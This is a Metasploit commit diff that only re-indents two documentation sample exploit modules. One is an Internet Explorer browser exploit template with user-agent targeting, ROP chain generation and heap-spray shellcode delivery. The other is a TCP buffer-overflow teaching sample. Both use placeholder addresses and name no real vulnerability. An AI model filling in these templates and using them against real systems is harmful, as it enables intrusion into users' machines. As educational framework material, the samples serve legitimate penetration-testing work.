Retab all the things (except external/)

documentation/samples/modules/exploits/ie_browser.rb

@@ -15,133 +15,133 @@ require 'msf/core'
 #
 ###
 class Metasploit4 < Msf::Exploit::Remote
-	Rank = NormalRanking
+  Rank = NormalRanking
 
-	include Msf::Exploit::Remote::HttpServer::HTML
-	include Msf::Exploit::RopDb
-	include Msf::Exploit::Remote::BrowserAutopwn
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::RopDb
+  include Msf::Exploit::Remote::BrowserAutopwn
 
-	# Set :classid and :method for ActiveX exploits. For example:
-	# :classid    => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
-	# :method     => "SetShapeNodeType",
-	autopwn_info({
-		:ua_name    => HttpClients::IE,
-		:ua_minver  => "8.0",
-		:ua_maxver  => "10.0",
-		:javascript => true,
-		:os_name    => OperatingSystems::WINDOWS,
-		:rank       => NormalRanking
-	})
+  # Set :classid and :method for ActiveX exploits. For example:
+  # :classid    => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
+  # :method     => "SetShapeNodeType",
+  autopwn_info({
+    :ua_name    => HttpClients::IE,
+    :ua_minver  => "8.0",
+    :ua_maxver  => "10.0",
+    :javascript => true,
+    :os_name    => OperatingSystems::WINDOWS,
+    :rank       => NormalRanking
+  })
 
-	def initialize(info={})
-		super(update_info(info,
-			'Name'           => "Module Name",
-			'Description'    => %q{
-				This template covers IE8/9/10, and uses the user-agent HTTP header to detect
-				the browser version.  Please note IE8 and newer may emulate an older IE version
-				in compatibility mode, in that case the module won't be able to detect the
-				browser correctly.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         => [ 'sinn3r' ],
-			'References'     =>
-				[
-					[ 'URL', 'http://metasploit.com' ]
-				],
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Automatic', {} ],
-					[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
-					[ 'IE 8 on Windows Vista',  { 'Rop' => :jre } ],
-					[ 'IE 8 on Windows 7',      { 'Rop' => :jre } ],
-					[ 'IE 9 on Windows 7',      { 'Rop' => :jre } ],
-					[ 'IE 10 on Windows 8',     { 'Rop' => :jre } ]
-				],
-			'Payload'        =>
-				{
-					'BadChars'        => "\x00",  # js_property_spray
-					'StackAdjustment' => -3500
-				},
-			'Privileged'     => false,
-			'DisclosureDate' => "Apr 1 2013",
-			'DefaultTarget'  => 0))
-	end
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Module Name",
+      'Description'    => %q{
+        This template covers IE8/9/10, and uses the user-agent HTTP header to detect
+        the browser version.  Please note IE8 and newer may emulate an older IE version
+        in compatibility mode, in that case the module won't be able to detect the
+        browser correctly.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'sinn3r' ],
+      'References'     =>
+        [
+          [ 'URL', 'http://metasploit.com' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ],
+          [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
+          [ 'IE 8 on Windows Vista',  { 'Rop' => :jre } ],
+          [ 'IE 8 on Windows 7',      { 'Rop' => :jre } ],
+          [ 'IE 9 on Windows 7',      { 'Rop' => :jre } ],
+          [ 'IE 10 on Windows 8',     { 'Rop' => :jre } ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars'        => "\x00",  # js_property_spray
+          'StackAdjustment' => -3500
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 1 2013",
+      'DefaultTarget'  => 0))
+  end
 
-	def get_target(agent)
-		return target if target.name != 'Automatic'
+  def get_target(agent)
+    return target if target.name != 'Automatic'
 
-		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
-		ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
+    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
+    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
 
-		ie_name = "IE #{ie}"
+    ie_name = "IE #{ie}"
 
-		case nt
-		when '5.1'
-			os_name = 'Windows XP SP3'
-		when '6.0'
-			os_name = 'Windows Vista'
-		when '6.1'
-			os_name = 'Windows 7'
-		when '6.2'
-			os_name = 'Windows 8'
-		end
+    case nt
+    when '5.1'
+      os_name = 'Windows XP SP3'
+    when '6.0'
+      os_name = 'Windows Vista'
+    when '6.1'
+      os_name = 'Windows 7'
+    when '6.2'
+      os_name = 'Windows 8'
+    end
 
-		targets.each do |t|
-			if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
-				return t
-			end
-		end
+    targets.each do |t|
+      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
+        return t
+      end
+    end
 
-		nil
-	end
+    nil
+  end
 
-	def get_payload(t)
-		stack_pivot = "\x41\x42\x43\x44"
-		code        = payload.encoded
+  def get_payload(t)
+    stack_pivot = "\x41\x42\x43\x44"
+    code        = payload.encoded
 
-		case t['Rop']
-		when :msvcrt
-			print_status("Using msvcrt ROP")
-			rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
+    case t['Rop']
+    when :msvcrt
+      print_status("Using msvcrt ROP")
+      rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
 
-		else
-			print_status("Using JRE ROP")
-			rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
-		end
+    else
+      print_status("Using JRE ROP")
+      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
+    end
 
-		rop_payload
-	end
+    rop_payload
+  end
 
 
-	def get_html(t)
-		js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
-		html = %Q|
-			<script>
-			#{js_property_spray}
+  def get_html(t)
+    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
+    html = %Q|
+      <script>
+      #{js_property_spray}
 
-			var s = unescape("#{js_p}");
-			sprayHeap({shellcode:s});
-			</script>
-		|
+      var s = unescape("#{js_p}");
+      sprayHeap({shellcode:s});
+      </script>
+    |
 
-		html.gsub(/^\t\t/, '')
-	end
+    html.gsub(/^\t\t/, '')
+  end
 
 
-	def on_request_uri(cli, request)
-		agent = request.headers['User-Agent']
-		print_status("Requesting: #{request.uri}")
+  def on_request_uri(cli, request)
+    agent = request.headers['User-Agent']
+    print_status("Requesting: #{request.uri}")
 
-		target = get_target(agent)
-		if target.nil?
-			print_error("Browser not supported, sending 404: #{agent}")
-			send_not_found(cli)
-			return
-		end
+    target = get_target(agent)
+    if target.nil?
+      print_error("Browser not supported, sending 404: #{agent}")
+      send_not_found(cli)
+      return
+    end
 
-		print_status("Target selected as: #{target.name}")
-		html = get_html(target)
-		send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
-	end
+    print_status("Target selected as: #{target.name}")
+    html = get_html(target)
+    send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
+  end
 end

documentation/samples/modules/exploits/sample.rb

@@ -15,71 +15,71 @@ require 'msf/core'
 ###
 class Metasploit4 < Msf::Exploit::Remote
 
-	#
-	# This exploit affects TCP servers, so we use the TCP client mixin.
-	#
-	include Exploit::Remote::Tcp
+  #
+  # This exploit affects TCP servers, so we use the TCP client mixin.
+  #
+  include Exploit::Remote::Tcp
 
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Sample Exploit',
-			'Description'    => %q{
-					This exploit module illustrates how a vulnerability could be exploited
-				in an TCP server that has a parsing bug.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         => ['skape'],
-			'References'     =>
-				[
-				],
-			'Payload'        =>
-				{
-					'Space'    => 1000,
-					'BadChars' => "\x00",
-				},
-			'Targets'        =>
-				[
-					# Target 0: Windows All
-					[
-						'Windows XP/Vista/7/8',
-						{
-							'Platform' => 'win',
-							'Ret'      => 0x41424344
-						}
-					],
-				],
-			'DisclosureDate' => "Apr 1 2013",
-			'DefaultTarget'  => 0))
-	end
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Sample Exploit',
+      'Description'    => %q{
+          This exploit module illustrates how a vulnerability could be exploited
+        in an TCP server that has a parsing bug.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => ['skape'],
+      'References'     =>
+        [
+        ],
+      'Payload'        =>
+        {
+          'Space'    => 1000,
+          'BadChars' => "\x00",
+        },
+      'Targets'        =>
+        [
+          # Target 0: Windows All
+          [
+            'Windows XP/Vista/7/8',
+            {
+              'Platform' => 'win',
+              'Ret'      => 0x41424344
+            }
+          ],
+        ],
+      'DisclosureDate' => "Apr 1 2013",
+      'DefaultTarget'  => 0))
+  end
 
-	#
-	# The sample exploit just indicates that the remote host is always
-	# vulnerable.
-	#
-	def check
-		Exploit::CheckCode::Vulnerable
-	end
+  #
+  # The sample exploit just indicates that the remote host is always
+  # vulnerable.
+  #
+  def check
+    Exploit::CheckCode::Vulnerable
+  end
 
-	#
-	# The exploit method connects to the remote service and sends 1024 random bytes
-	# followed by the fake return address and then the payload.
-	#
-	def exploit
-		connect
+  #
+  # The exploit method connects to the remote service and sends 1024 random bytes
+  # followed by the fake return address and then the payload.
+  #
+  def exploit
+    connect
 
-		print_status("Sending #{payload.encoded.length} byte payload...")
+    print_status("Sending #{payload.encoded.length} byte payload...")
 
-		# Build the buffer for transmission
-		buf  = rand_text_alpha(1024)
-		buf << [ target.ret ].pack('V')
-		buf << payload.encoded
+    # Build the buffer for transmission
+    buf  = rand_text_alpha(1024)
+    buf << [ target.ret ].pack('V')
+    buf << payload.encoded
 
-		# Send it off
-		sock.put(buf)
-		sock.get_once
+    # Send it off
+    sock.put(buf)
+    sock.get_once
 
-		handler
-	end
+    handler
+  end
 
 end